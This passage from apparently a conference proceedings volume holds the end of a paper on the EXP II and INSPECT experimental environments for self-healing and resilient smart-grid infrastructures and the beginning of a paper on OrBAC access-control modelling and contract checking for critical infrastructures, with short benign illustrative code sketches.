In this paper we introduce two environments, EXP II and INSPECT, intended to support our investigations towards such ends. The tools are mainly extensions of tools from earlier EU projects such as CRISP and Alfebiite (http://www.iis.ee.ic.ac.uk/~alfebiite/ab-consortium-page.htm#Partners). The remainder of the paper is organized as follows. In Sect. 2, Self-healing and resilience, we identify important aspects of some of the challenges outlined above. Sect. 3, The EXP II and INSPECT environments, introduces and motivates the tools aimed at configuring and performing experiments in controlled environments. In Sect. 4, Configurable experiments, we outline our experimental frameworks. Sect. 5, Other approaches, gives a short overview of related international efforts. Sect. 6, Conclusions, gives a short summary and some pointers to the future.
2 Self-healing and Resilience
Today's software- and system-engineering efforts are largely predicated on the notion that, with sufficient effort, one can design systems that eliminate all critical flaws. Hence most techniques for the development of trustworthy software have focused on design-time techniques: specification, modeling and analysis, validation, protocol design, etc. This approach works quite well for systems that function in a known and controlled environment, that interact with other systems over which we have considerable control, and that can be taken off-line to correct problems. However, there is an increasing number of systems (as in our case) that must function with an expected QoS while operating in highly unpredictable, even hostile, environments. These systems must be able to interact with components of dubious quality and/or origin. They must function in a world where resources are neither limitless nor assured, and where cost may be a major concern in achieving trustworthy behavior. And they might be expected to run without interruption. For such systems it becomes essential that they take more responsibility for their own behavior, adapting appropriately at run-time in order to maintain adequate levels of service. They must be able to detect when problems arise and fix them automatically or semi-automatically. The Autonomic Computing Initiative by IBM (2001; http://researchweb.watson.ibm.com/autonomic/overview/challenges.html) introduced the concept of Self-Management to address some of these challenges. Self-management was subdivided into the following self-* components: self-configuring, self-adaptive, self-optimizing, self-detecting, self-protecting, self-healing, and self-organizing. None of these concepts is well defined, but there are several descriptions useful for our purpose, such as Elements of the Self-Healing System Problem Space [11] and Self-healing systems survey and synthesis [4], along with reports from the EU project IST-516933 Web Services Diagnosability, Monitoring and Diagnosis (WS-DIAMOND, http://wsdiamond.di.unito.it/). The elements identified in [11] are: fault model, system response, system completeness, and design context. In [4] the following useful definition of self-healability is given:
Self-healability. Self-healability is the property that enables a system to perceive that it is not operating correctly and, without human intervention, make the necessary adjustments to restore itself to normality.
This definition can be related to the definitions of:
– Dependable systems, which are defined as systems globally trustworthy with respect to their ability to always deliver their service.
– Fault-tolerant systems, in which faults may occur but do not affect the performance of the system.
– Resilient systems, which can reconfigure to harness disturbances.
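To make this definition concrete, the following minimal sketch (our own illustration, not taken from [4] or [11]; the measurement probe and repair action are simulated placeholders) shows the monitor-diagnose-repair cycle that the definition implies: the system observes its own state, perceives a deviation from normality, and applies a corrective action without human intervention.

import random

NOMINAL_HZ = 50.0
TOLERANCE_HZ = 0.5

def read_frequency_hz():
    """Simulated measurement probe; a real probe would query the grid."""
    return NOMINAL_HZ + random.uniform(-1.0, 1.0)

def shed_load():
    """Simulated repair action that restores the system towards normality."""
    print("repair: shedding load to restore frequency")

def self_healing_step():
    """One monitor-diagnose-repair cycle: perceive incorrect operation,
    then adjust without human intervention (cf. the definition in [4])."""
    f = read_frequency_hz()
    if abs(f - NOMINAL_HZ) > TOLERANCE_HZ:  # perceive the deviation
        shed_load()                         # adjust to restore normality
        return "healed"
    return "normal"

if __name__ == "__main__":
    for _ in range(5):
        print(self_healing_step())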
In contrast to these three definitions, which specify goals but not means, self-healability aims at actively correcting undesirable system situations. It is an active approach that operationalizes the definitions stated above. In our case we will have different elements and operationalizations, depending on the critical infrastructure at hand (EMS, ICT, CBS; see Section 2.1). The WS-DIAMOND approach follows the definition given above in the context of Web services. Those three reports together serve as background to our own approach, illustrated by the EXP II and INSPECT environments as reported in Sect. 3 and Sect. 4. A desirable systemic property of critical infrastructures is resilience. Due to the inherent complexity of the systems involved, this property is only attainable by utilizing well-chosen and well-implemented mechanisms supporting self-healing. The remainder of this section discusses these issues in further detail.
2.1 Complexity Issues of Software-Intensive Systems
The INTEGRAL approach is to integrate novel and emergent ideas from Energy Management Systems (EMS) and ICT systems in order to support DER/RES integration as well as new energy-based business models and processes. In fact, we are investigating the interactions between, as well as within, two internationally identified critical infrastructures (EMS and ICT), in support of a third, Critical Business Systems (CBS); in short, challenges related to intra- and interdependencies in and between critical infrastructures. Fig. 1 gives an overview of the INTEGRAL project. The efficiency of active distribution networks relies on the combination of three types of distributed resources: distributed generation, distribution grids and demand side integration (DSI).
Fig. 1. Overview of the main concepts of cell-based virtual utilities addressed in the INTEGRAL project (ICT coordination of demand side integration via SCADA/DMS, distributed generation, distributed load and the distribution grid, through intelligent control, management and operation)
Fig. 2. Coordination between the grid management and computational market infrastructures in virtual cell-based utilities (utility-side grid operations and customer-side business operations, linked in real time by stabilization coordination, business coordination and meta-coordination)
The main operation modes addressed are: normal operation states (Field test A), critical operation states (Field test B) and emergency operation states (Field test C). Fig. 2 illustrates the basic coordination patterns of the cell-based virtual utility outlined in Fig. 1: under normal conditions, the interaction between the Technical Grid Management (TGM) and the business processes of the computational market (CBS) is loosely coupled. It should be noted that the architecture of the information system (ICT), i.e., the glue between TGM and CBS, is an invisible overlay of TGM and CBS in Fig. 2. If the TGM enters a critical (yellow) state, a high-level meta-coordination takes control of the overall coordination of both infrastructures. For instance, the computational market might utilize its market processes (buy or sell) to bring the technical grid back into a green state while maintaining quality of service. Fig. 2 also illustrates that we might have several feedback loops at different levels between, as well as within, our critical infrastructures. Those feedback loops potentially create non-linear system behaviors, that is, complex behaviors that are difficult to analyze, predict and control. We have to face the challenge of designing, implementing and maintaining resilient open complex systems. Monitoring, coordinating and controlling virtual utilities as depicted in Fig. 1 hence poses new challenges related to the proper definition of system states, instrumentation and measurements. Fig. 3 illustrates a state model for the electric grid part of Fig. 2; the classification scheme of states was proposed by CIGRE [20]. The CIGRE diagram shows that states can be defined in terms of adequacy and stability. That definition suits us well, given the analysis above. However, the only transitions among states considered in this model are those due to consequences of natural events.
Fig. 3. Classification scheme of operational states of a power system
Present SCADA systems have two well-known shortcomings in meeting the requirements of future DER/RES virtual utilities (Sandia, http://www.sandia.gov/scada/home/htm):
– Inherent vulnerabilities, which are exploitable when SCADA systems are integrated with 'foreign' networks.
– Present-day hard-wired hierarchical systems, which make it hard to cope with the integration of new RES and DER as well as to open up for new energy-based business processes.
Decoupling SCADA systems enables virtualization at interaction points, and hence self-healing, as well as a configurable service-based system approach. Exploits of vulnerabilities by an adversary result in attack patterns that pose growing threats to our critical infrastructures (CERT Coordination Center, CERT/CC, http://www.cert.org/certcc.html). Such attack patterns can be instantiated by an adversary having the motive, means and resources to do so, but unintended exploits of vulnerabilities due to software or protocol bugs can also cause system failures or breakdowns of a potentially similar magnitude. A recent thesis on risk assessment for power system security with regard to intentional events addresses the first aspect [18]. Important sources with regard to both aspects are the Common Attack Pattern Enumeration and Classification (CAPEC, http://capec.mitre.org) and Common Vulnerabilities and Exposures (CVE, http://cve.mitre.org). Our approach towards system hardening has been in the same direction [14,15]. To handle state transitions due to foreign events, the concepts and states of Fig. 3 have been further elaborated, including new transitions between operating states [18]. To illustrate the complexities we have to address in maintaining adequate and normal operations of DER/RES cell-based systems as in Fig. 1, observe that we both have to identify a suitable state diagram of the infrastructure supporting the computational market (CBS) and instrument and monitor the combined system in order to ascertain adequate operations. Furthermore, the system states being identified and monitored are typically not in equilibrium at any given time, again due to the inherent complexity and feedback loops of our system. We can at best hope that the system at hand is near equilibrium states most of the time, enabling
controllable behavior. It might, of course, be the case that we are in states far from equilibrium. If so, a small change of parameters could result in a quick jump to another (catastrophic) state, due to bifurcation [16]. To further illustrate the complexity of our task, we have inherent uncertainties in measurements of system parameters and inherent limitations of bandwidth and computational power. In short, there is no such thing as a correct and shared view of the system states of our distributed systems [12]. The bottom line is that we have to engineer our ICT system to provide sustainable, ensured, optimal and adequate operational support for the combined systems (Fig. 2). A second conclusion is that we have to build systems that are as resilient and secure as possible. To that end we use modularization and virtualization techniques to embed self-healing mechanisms at different system levels.
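As an illustration of the kind of state model discussed here, the sketch below encodes a simplified operational-state machine (the state names and transition rules are our simplification, not the exact CIGRE diagram of Fig. 3), extended, in the spirit of [18], with a transition triggered by a foreign (intentional) event in addition to natural ones.

from enum import Enum

class GridState(Enum):
    NORMAL = "normal"            # adequate and stable
    ALERT = "alert"              # adequate but reduced margins (yellow)
    EMERGENCY = "emergency"      # stability or adequacy violated
    RESTORATIVE = "restorative"  # recovering towards normal operation

# Simplified transition table: (state, event) -> next state.
# "Natural" events follow a CIGRE-style escalation; "foreign" events
# (attacks, software faults) add transitions as proposed in [18].
TRANSITIONS = {
    (GridState.NORMAL, "load_surge"): GridState.ALERT,
    (GridState.ALERT, "contingency"): GridState.EMERGENCY,
    (GridState.ALERT, "rearmed"): GridState.NORMAL,
    (GridState.EMERGENCY, "load_shed"): GridState.RESTORATIVE,
    (GridState.RESTORATIVE, "resync"): GridState.NORMAL,
    # A foreign event can bypass the natural escalation path:
    (GridState.NORMAL, "intrusion"): GridState.EMERGENCY,
}

def step(state, event):
    """Return the next operational state; unknown events keep the state."""
    return TRANSITIONS.get((state, event), state)

if __name__ == "__main__":
    s = GridState.NORMAL
    for e in ["load_surge", "contingency", "load_shed", "resync"]:
        s = step(s, e)
        print(e, "->", s.value)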
2.2 Mechanisms of Self-healing
Self-healing, as a concept, has a long history in computing. Historically, however, efforts have mainly been related to the introduction of adaptation mechanisms in operating systems or multiprocessor systems. Self-healing can be defined as a means to transform brittle, tightly coupled systems into loosely coupled, ductile systems with flexible interaction patterns (virtualization). The idea is that the flexibility of interaction can absorb (self-heal) disturbances not foreseeable at design time. That said, it is unavoidable that self-healing mechanisms have to be engineered from carefully performed experiments. Our efforts on self-healing mechanisms have focused on the low and high levels of interaction (Fig. 5), that is, on securing software execution by the use of hardening mechanisms (Section 3) and on mission-level self-healing [9]. The purpose of the tools and environments introduced in Sect. 3 is to further identify and implement self-healing mechanisms at the remaining system levels in a principled way.
3 The EXP II and INSPECT Environments
The EXP II and INSPECT tools and environments are continuations of our efforts towards investigating reliability, security and resilience aspects of critical infrastructures. The starting point was a set of experiments related to the CRISP project. Fig. 4 depicts our experimental set-up at that time.
Fig. 4. Conceptual view of controlled experiments in CRISP of the behaviors of the critical infrastructures controlled and monitored by the nodes A, B and C
The basic services provided by the EXP controller are generic services (parameter settings), a runtime configuration base, and experiment-specific services (including restoration and start-up services). The main results of the CRISP experiments are:
– Coordination between infrastructures in 'yellow situations'.
– Customized IP protocols to meet real-time network requirements.
– Implementation of secure execution environments implementing self-healing mechanisms that protect the execution of unreliable software.
– Visualization of system status, from different points of view, to support operators' understanding of system components and their interactions and behavior.
A comprehensive account of the theoretical foundations and engineering aspects related to EXP is given in the thesis Informed System Protection [14]. Other results are reported in several papers in different contexts [3,6,7,8,19]. The purpose of the EXP suite of environments is to allow for controlled experiments on critical infrastructures. In fact, the new EXP II environment allows us to make experiments much along the lines of those envisaged by the NSF GENI initiative (http://www.geni.net; cf. Fig. 5). The purpose of the INSPECT tool is to explicitly model and assess information flows across component boundaries (Sec. 4). Those experiments aim at developing and testing self-healing mechanisms to ensure resilience. Arguably, modeling, understanding and maintaining correct information flows is fundamental for ensuring the proper behavior of critical infrastructures [5] (ARECI, Fig. 5). From Fig. 5 we can read that there are different types of information involved in the systems we are addressing, i.e., measurements, control information and user information. Furthermore, the information has different formats and is typically transformed during its flow through the systems.
4 Configurable Experiments
The following experimental environment, based on EXP II, is an evolution of the experimental environment of Fig. 4. The main features of our new environment under development are:
– Support for environment manipulation during experiments, e.g., fault injections.
– Virtualization at interaction points at borders.
– Support for experiments on instrumentation and measurements (a network of software probes).
– Support for feedback, calibration and debugging.
– Support for configuration of experimental environments: programmable nodes and connectivity models.
As a complement, the INSPECT tool allows us to model different connectivity models, such as publish/subscribe, broadcast or peer-to-peer, supported by high-level programmable contract-based interaction protocols. Messages are indexed and transmitted by a pattern-based message router. Subscriptions and notifications are based on pattern matching of contract protocols. The indexing allows for on-line monitoring or off-line analysis of messages related to predefined contract-based dialogues. The off-line analysis of stored messages is supported by event calculus logic. Correctness of interactions, or forensics related to breakdowns of communications, can thus be established. The theoretical underpinnings and their applicability are reported in [10].
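To indicate what such a pattern-based router might look like, here is a minimal sketch (our own illustration; the paper does not describe INSPECT's implementation at this level of detail) of a publish/subscribe router that matches messages against subscription patterns and keeps an indexed log for off-line analysis of contract-based dialogues.

from collections import defaultdict

class PatternRouter:
    """Minimal pattern-based message router: a subscription is a dict of
    field -> required value; the indexed log supports off-line analysis."""

    def __init__(self):
        self.subscribers = []           # (pattern, callback) pairs
        self.log = []                   # ordered message log
        self.index = defaultdict(list)  # (field, value) -> log positions

    def subscribe(self, pattern, callback):
        self.subscribers.append((pattern, callback))

    def publish(self, message):
        # Index the message for later forensic queries.
        pos = len(self.log)
        self.log.append(message)
        for field, value in message.items():
            self.index[(field, value)].append(pos)
        # Notify every subscriber whose pattern matches the message.
        for pattern, callback in self.subscribers:
            if all(message.get(f) == v for f, v in pattern.items()):
                callback(message)

    def query(self, field, value):
        """Off-line analysis: all logged messages with field == value."""
        return [self.log[i] for i in self.index[(field, value)]]

if __name__ == "__main__":
    router = PatternRouter()
    router.subscribe({"contract": "WS1", "type": "arming"},
                     lambda m: print("notify:", m))
    router.publish({"contract": "WS1", "type": "arming", "src": "TS_CC"})
    print(router.query("contract", "WS1"))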
5 Other Approaches
There is an increasing international interest in understanding the fundamentals of critical infrastructures. Methods and models related to systemic properties such as dependability, security, resilience and self-healing are the focus of several international and national R&D programs. Besides the references given in Sect. 1 and Sect. 2, the following references related to self-healing are illustrative [1,2,13,17,21]. However, most current research on this topic concerns formal models, methods or frameworks. In this paper we advocate a complementary experimental approach, much in line with the NSF GENI approach. The GENI initiative by NSF designs and implements a flexible experimental platform towards understanding the Future Internet and fundamental innovations in networking and distributed systems. GENI provides these capabilities through an innovative combination of techniques: virtualization, programmability, controlled communication, and modularity. Of particular interest to us is the "Availability and Robustness of Electronic Communications Infrastructures" (ARECI) report, produced by Alcatel-Lucent for the European Commission (Report to EU DG Information Society and Media, Alcatel-Lucent, 2007). A main contribution is the Eight Ingredient Framework of communication infrastructures (Bell Labs Technical Journal 11(3), 73-81, 2006). The report focuses on how to mitigate vulnerabilities in the eight ingredients, to avoid threats exploiting those vulnerabilities. Fig. 5 gives an overview of some key concepts and the proposed network security framework. In our approach we make a selection of appropriate models and methods as outlined above. An overview of service-centric systems is given in a recent IEEE journal issue (IEEE Software, November-December 2007, special issue on Service-Centric Software Systems). A recent IFIP book on related Critical Infrastructure Protection issues is [5].
Fig. 5. The ARECI security model: three security layers (applications security, services security, infrastructure security); three planes (end-user, control, management); eight security dimensions (access control, authentication, non-repudiation, data confidentiality, communication security, data integrity, availability, privacy); five threats (destruction, corruption, removal, disclosure, interruption); attacks exploit security vulnerabilities
6 Conclusions
We have outlined and motivated two tools and environments supporting a structured, experiment-based approach towards hardening critical infrastructures. The case study is the ongoing EU project INTEGRAL, focusing on resilient integration of DER/RES in virtual utilities. The mitigation of vulnerabilities is supported by an engineering approach utilizing a combination of virtualization and self-healing techniques. The work reported is to a high degree work in progress, but with some promising results. The next steps will focus on:
– Proper definitions of states and the related instrumentation and measurements.
– Modeling and evaluation of information flows across boundaries.
– Developing self-healing mechanisms harnessing vulnerabilities identified by CAPEC and CVE.
References
1. Abdelwahed, S., Kandasamy, N., Neema, S.: A control-based framework for self-managing distributed computing systems. In: Proceedings of the 1st ACM SIGSOFT Workshop on Self-Managed Systems, pp. 3-7. ACM, New York (2004)
2. Bradbury, J., Cordy, J., Dingel, J., Wermelinger, M.: A survey of self-management in dynamic software architecture specifications. In: Proceedings of the 1st ACM SIGSOFT Workshop on Self-Managed Systems, pp. 28-33. ACM, New York (2004)
3. Fontela Garcia, M.: Interaction des réseaux de transport et de distribution en présence de productions décentralisées. Thèse de Doctorat, INP Grenoble, juillet 2008
4. Ghosh, D., Sharman, R., Rao, R., Upadhyaya, S.: Self-healing systems survey and synthesis. Decision Support Systems 42(4), 2164-2185 (2007)
5. Goetz, E., Shenoi, S. (eds.): Critical Infrastructure Protection. IFIP. Springer, Heidelberg (2008)
6. Gustavsson, R.: Ensuring Dependability in Service Oriented Computing. In: Proceedings of the 2006 International Conference on Security & Management (SAM 2006) at the 2006 World Congress in Computer Science, Computer Engineering, and Applied Computing (2006)
7. Gustavsson, R.: Sustainable Virtual Utilities Based on Microgrids. In: Proceedings of the Third International Symposium on Energy, Informatics and Cybernetics (EIC 2007), Best Paper Award (2007)
8. Gustavsson, R.: Ensuring Quality of Service in Service Oriented Critical Infrastructures. In: Proceedings of the International Workshop on Complex Network and Infrastructure Protection (CNIP 2006). Italian National Agency for New Technologies, Energy and the Environment (ENEA) (2006)
9. Gustavsson, R., Fredriksson, M.: Process Algebra as Support for Sustainable Systems of Services. In: Viroli, M., Omicini, A. (eds.) Algebraic Approaches for Multiagent Systems. Special issue of Journal of Applicable Algebra in Engineering, Communication and Computing (AAECC), vol. 16, pp. 179-203. Springer, Heidelberg (2005)
10. Knottenbelt, J., Clark, K.: Contract Related Agents. In: Toni, F., Torroni, P. (eds.) CLIMA 2005. LNCS, vol. 3900, pp. 226-242. Springer, Heidelberg (2006)
11. Koopman, P.: Elements of the Self-Healing System Problem Space. In: Proceedings of the WADS 2003 Workshop on Software Architectures for Dependable Systems at ICSE 2003, International Conference on Software Engineering, Portland, Oregon (2003)
12. Lindh, J.-O.: On Observation of and Interaction in Open Distributed Systems. Doctoral Dissertation Series No. 2006:06, Blekinge Institute of Technology (2006)
13. Mamei, M., Zambonelli, F.: Self-Maintaining Overlay Data Structures for Pervasive Autonomic Services. In: Keller, A., Martin-Flatin, J.-P. (eds.) SelfMan 2006. LNCS, vol. 3996, pp. 58-72. Springer, Heidelberg (2006)
14. Mellstrand, P.: Informed System Protection. Doctoral Dissertation Series No. 2007:10, Blekinge Institute of Technology (2007)
15. Mellstrand, P., Gustavsson, R.: Experiment Based Validation of CIIP. In: López, J. (ed.) CRITIS 2006. LNCS, vol. 4347, pp. 15-29. Springer, Heidelberg (2006)
16. Nicolis, G., Prigogine, I.: Self-Organization in Non-Equilibrium Systems (Chaps. III and IV). J. Wiley and Sons, New York (1977)
17. Park, J., Yoo, G., Lee, E.: Proactive Self-Healing Systems Based on Multi-Agent Technologies. In: Proceedings of the Third ACIS International Conference on Software Engineering Research, Management and Applications (SERA 2005). IEEE, Los Alamitos (2005)
18. Tranchita, C.: Risk Assessment for Power System Security with Regard to Intentional Events. Thèse, Institut Polytechnique de Grenoble (2008)
19. Warmer, C., Kamphuis, R., Mellstrand, P., Gustavsson, R.: Distributed Control in Electricity Infrastructure. In: Proceedings of the International Conference on Future Power Systems, pp. 1-7 (2005). ISBN 90-78205-02-4, INSPEC Accession Number 9045591
20. CIGRE WG 38-03: Power Systems Security Assessment: A Position Paper. CIGRE Electra No. 175, pp. 53-77 (December 1997)
21. Weyns, D., Haesevoets, R., Van Eylen, B., Helleboogh, A., Holvoet, T., Joosen, W.: Endogenous versus exogenous self-management. In: Proceedings of the 2008 International Workshop on Software Engineering for Adaptive and Self-Managing Systems (SEAMS 2008), pp. 41-48 (2008). ISBN 978-1-60568-037-1
Critical Infrastructures Security Modeling, Enforcement and Runtime Checking
Anas Abou El Kalam 1 and Yves Deswarte 2
1 Université de Toulouse, IRIT - CNRS, ENSEEIHT - INPT
[email protected]
2 Université de Toulouse, LAAS-CNRS
[email protected]
Abstract. This paper identifies the most relevant security requirements for critical infrastructures (CIs) and, according to these requirements, proposes an access control framework. The latter supports CI security policy modeling and enforcement. It then proposes a runtime model checker for the interactions between the organizations forming the CIs, to verify their compliance with previously signed contracts. In this respect, our security framework not only handles secure local and remote accesses, but also audits and verifies the different interactions. In particular, remote accesses are controlled, every deviation from the signed contracts triggers an alarm, the concerned parties are notified, and audits can be used as evidence for sanctioning the party responsible for the deviation.
Keywords: Security policies and models, access control enforcement, security of critical infrastructures, runtime model checking.
1 Introduction
Protecting Critical Infrastructures (CIs) has become one of the biggest concerns for the safety of our society. On the one hand, these infrastructures grow and become increasingly complex; on the other hand, their resilience and security issues are not completely understood, mainly due to their hybrid composition. For example, traditional SCADA systems were not designed to be widely distributed and remotely accessed; they grew up standalone and closed, with only physical security in mind. Nowadays, the situation is quite different, and interdependencies with other infrastructures require openness and interoperability. Moreover, the 9/11 events, the North America blackout (2003) [1] and many other examples demonstrate the complex interactions between physical and cyber infrastructures and emphasize how important protecting these CIs is. The international community is worried about these problems, and many efforts are deployed to manage CI-related risks. For example, in the USA, NERC has organized a Cyber Security Urgent Action (NERC UA 1200 and 1300), which resulted in the definition of a set of standards (CIP-001-1 to CIP-009-1) [2]. In this context, it is important to note that all these committees and reports claim that security-related issues are among the most serious problems in CIs. For example, the US Department of Homeland Security has set up an experiment where hackers attacked the software controlling a power generator, which ended in the destruction of the generator
[3]. Not only does this experiment prove that cyber-attacks on CIs can be the next form of terrorism, but it also reminds us that code written for CIs can be as vulnerable as any other kind of software, and that these vulnerabilities can be exploited to cause physical as well as logical damage. Furthermore, several studies have shown that one of the most common problems in CI protection is the lack of adequate security policies, in particular in modern SCADA environments [4]. In this paper, we first identify the security requirements of CIs (Section 2). Then, in Section 3, we present some security models and policies and discuss their applicability to CIs. We will show that deriving a security policy and implementing it with traditional security mechanisms is not sufficient in our context. In fact, while these mechanisms are able to enforce permissions, they do not efficiently enforce obligations and explicit prohibitions, although these kinds of rules are very important in CIs. Moreover, in such systems, it is crucial to audit the different actions and alarms: not only should we be able to keep an audit trail, we should also be able to identify precisely whether a certain CI respects its obligations and complies with its expected behavior. For these reasons, in Section 4 we present a runtime model checker (based on timed automata) that is able to verify the correct execution of the interaction protocol between the different organizations, according to the contracts they have previously signed. Finally, in Section 5 we draw our conclusions and present open issues in this area. The main contributions of this paper are:
1. a clear identification of CI security requirements;
2. a framework to express a global security policy for a set of connected CIs, which enables specifying their security policies and deriving concrete access control decisions as well as suitable security enforcement mechanisms;
3. a template to specify the requirements of the contracts that can be signed between CI partners, and a framework to securely check the correct execution of the contract clauses by verifying certain security properties, and to audit the interactions between partners.
In this way, we not only enforce intra-organizational access control, but also check (at runtime) and audit the extra-organizational interactions as well as remote accesses, with the possibility to prove infractions and to clearly identify responsibilities in case of dispute.
2 Security Requirements of CIs
In order to progressively derive an access control model and a secure architecture adapted to CIs, we first identify the security requirements of a CI and confront them with existing access control models. Note that even if we take our examples from the electric power grid, the same approach and results apply to any kind of CI. Globally, a CI can be seen as a WAN connecting several organizations involving different actors and stakeholders (e.g., power generation companies, energy authorities, transmission and distribution system operators). Each of these organizations is operated as a LAN, composed of one or more logical and physical systems, and the LANs are interconnected through specific switches to form the WAN. In the context of the CRUTIAL (CRitical
UTility InfrastructurAL Resilience) European FP6-IST research project, the switches are called CIS (CRUTIAL Information Switches) [5]. In this respect, we can identify the following security-related requirements:
1. Secure cooperation between different organizations, possibly mutually suspicious, with different features, operation rules and security policies.
2. Autonomous organizations: each organization controls its own security policy, applications, etc., while cooperating for the global operation of the whole system. We thus need a global security policy that manages the communication between partners while keeping each CI responsible for its own assets and users.
3. Consistency: as no SCADA system operates in isolation, the global as well as the local security policies should be compatible.
4. Distributed security: the enforcement and administration of the security policies should be decentralized. A centralized approach is not appropriate, since a CI involves the cooperation of independent organizations with different, sometimes conflicting, interests and no agreed global authority. Conversely, handling the collaboration between the subsystems while keeping some local self-determination seems more appropriate.
5. Heterogeneity: as each organization is free to have its own structure, services and IS, a CI is heterogeneous. Moreover, the security policy must be vendor- and manufacturer-independent: when technology changes or when new components or systems are implemented in a CI, the policy must remain effective.
6. Granularity vs. scalability: on the one hand, security rules must be extensible in size and structure; on the other hand, internal authentication as well as local access controls should be managed by each organization separately.
7. Fine-grained, dynamic access control: access control enforcement must be at a low granularity level to be efficient, while access decisions should take the context (e.g., specific situations, with time and location constraints) into account. Moreover, as the context may change often and as a certain reactivity is required in such systems, organizations should support dynamic access rights.
8. User-friendliness and ease of rule administration: as the system links several geographically distributed organizations and handles a large amount of information and many users, access rights management should be sufficiently user-friendly to manage such complexity without introducing human errors.
9. External accesses: each organization's security policy should define if and how outsiders can access the automation system belonging to the organization. E.g., it is important to define how equipment vendors can access the system remotely for off-site maintenance and product upgrades, but also how other organizations participating in the CI can access local resources.
10. Compliance with specific regulations: e.g., in the United States, NERC 1200 [3] specifies cyber-security requirements for electric utilities.
11. Confidentiality, integrity and availability: contrary to other systems where mostly confidentiality (military systems), integrity (financial systems) or availability is needed, in CIs we often need all three properties: confidentiality of each CI's data (e.g., invitations to tender), but also integrity and availability of data such as voltage/frequency measurements.
12. Enforcement of permission, explicit prohibition and obligation rules: explicit prohibitions can be particularly useful, as we have decentralized policies where each administrator does not know the details of the other parts of the infrastructure. Moreover, explicit prohibitions can also specify exceptions, or limit the propagation of permissions in case of role hierarchies. Similarly, obligations can be useful to impose actions that should be carried out by users or that should be automatically performed by the system itself.
13. Audit and assessment: the security policy should define audit requirements, such as what data must be logged, when, where, etc. In particular, an audit should determine whether the protections detailed in the policy are being correctly used in practice; it also keeps logs of interactions between partners, to verify that they comply with the bi-party contracts, and provides evidence in case of dispute.
14. Support, enforcement and real-time checking of the contracts that can be established between the different organizations: we should be able to capture and check all the access modalities (permissions, prohibitions and obligations) and temporal modalities, as well as the liabilities concerning compliance with the contracts.
The security requirements cited above should be expressed through a suitable security policy. The security policy is defined by the ITSEC as the set of laws, rules, and practices that regulate how sensitive information and other resources are managed, protected and distributed within a specific system [6]. In this respect, a security policy is specified through security requirements that must be satisfied, and rules expressing how the system may evolve in a secure way. Nevertheless, by itself, the security policy does not guarantee that the system runs correctly and securely: the security policy can indeed be badly designed or violated, intentionally or accidentally. Consequently, it is important to express the policy according to a security model. A model helps to: abstract the policy and handle its complexity; represent the secure states of a system (i.e., states that satisfy the security requirements) as well as the ways in which the system may evolve; and verify the consistency of the security policy and detect possible conflicting situations. In the next section we present three different categories of access control models and policies and confront them with the CI requirements cited above.
3 An Access Control Model for CIs
3.1 OrBAC
In [7], we defined the OrBAC (Organization-Based Access Control) model as an extension of the traditional RBAC (Role-Based Access Control) model [8]. To manage the security policy complexity, our first goal was to express it with abstract entities only, and thus to separate the representation of the security policy from its implementation. Indeed, OrBAC is based on roles to abstract users, views as the abstraction of objects, and activities as the abstraction of actions. In OrBAC, an activity is a group of one or more actions; a view is a group of one or more objects; and a context is a specific situation that conditions the validity of a rule. Two security levels can be distinguished in OrBAC:
– Abstract level: the security administrator defines security rules through abstract entities (roles, activities, views) without worrying about how each organization implements these entities.
– Concrete level: when a user requests an access, authorizations are granted to him according to the relevant rules, the organization, the role currently played by the user, the requested action (instantiating an activity defined in the rule) on the object (instantiating a view defined in the rule), and the current context.
The derivation of permissions (i.e., the runtime instantiation of security rules) can be formally expressed as follows:
∀ org ∈ Organization, ∀ s ∈ Subject, ∀ α ∈ Action, ∀ o ∈ Object, ∀ r ∈ Role, ∀ a ∈ Activity, ∀ v ∈ View, ∀ c ∈ Context:
Permission(org, r, v, a, c) ∧ Empower(org, s, r) ∧ Consider(org, α, a) ∧ Use(org, o, v) ∧ Hold(org, s, α, o, c) → Is_permitted(s, α, o)
This rule means: if, in a certain organization org, a security rule specifies that role r can carry out activity a on view v when context c is true; if r is assigned to subject s; if action α is a part of a; if object o is part of v; and if context c holds; then s is allowed to perform α (e.g., SELECT) on o (e.g., F1.TXT). Prohibitions and obligations can be defined in the same way. As rules are expressed only through abstract entities, OrBAC is able to specify the security policies of several collaborating and heterogeneous sub-organizations (e.g., in a CI) of a global organization. In fact, the same role, e.g., OPERATOR, can be played by several users belonging to different sub-organizations; the same view, e.g., TECHNICAL FILE, can designate a table TF-TABLE in one sub-organization or an XML object TF1.XML in another one; and the same activity READ can correspond to a SELECT action in one sub-organization, while in another it may be an OPEN XML FILE() action. In our context, OrBAC presents several benefits and satisfies several security requirements of CIs: rule expressiveness, abstraction of the security policy, scalability, heterogeneity, evolvability, and user-friendliness. However, OrBAC is centralized and does not handle collaborations between non-hierarchical CIs. In fact, as OrBAC security rules have the Permission(org, r, v, a, c) form, it is not possible to represent rules that involve several autonomous organizations. Moreover, it is impossible to associate permissions with users belonging to other partner organizations. As a result, OrBAC is unfortunately only adapted to centralized infrastructures and does not cover the distribution, collaboration and interoperability needs of current CIs.
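To illustrate how the derivation rule above can be evaluated at runtime, the following sketch (our own illustration; the fact base uses example entities from the PolyOrBAC scenario later in the paper, and the encoding itself is hypothetical) checks a concrete access request against the abstract rule base:

# Fact base for one organization: an abstract rule plus the assignments
# that map concrete entities (users, actions, objects) to abstract ones.
permissions = {("B", "Operator", "Measurements", "Consulting", "Emergency")}
empower = {("B", "PartnerA", "Operator")}   # Empower(org, subject, role)
consider = {("B", "select", "Consulting")}  # Consider(org, action, activity)
use = {("B", "meas_table", "Measurements")} # Use(org, object, view)
hold = {("B", "PartnerA", "select", "meas_table", "Emergency")}  # context holds

def is_permitted(org, subject, action, obj):
    """Concrete access decision derived from the abstract OrBAC rules:
    Permission AND Empower AND Consider AND Use AND Hold -> Is_permitted."""
    for (o, role, view, activity, ctx) in permissions:
        if (o == org
                and (org, subject, role) in empower
                and (org, action, activity) in consider
                and (org, obj, view) in use
                and (org, subject, action, obj, ctx) in hold):
            return True
    return False

print(is_permitted("B", "PartnerA", "select", "meas_table"))  # True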
3.2 Multi-OrBAC
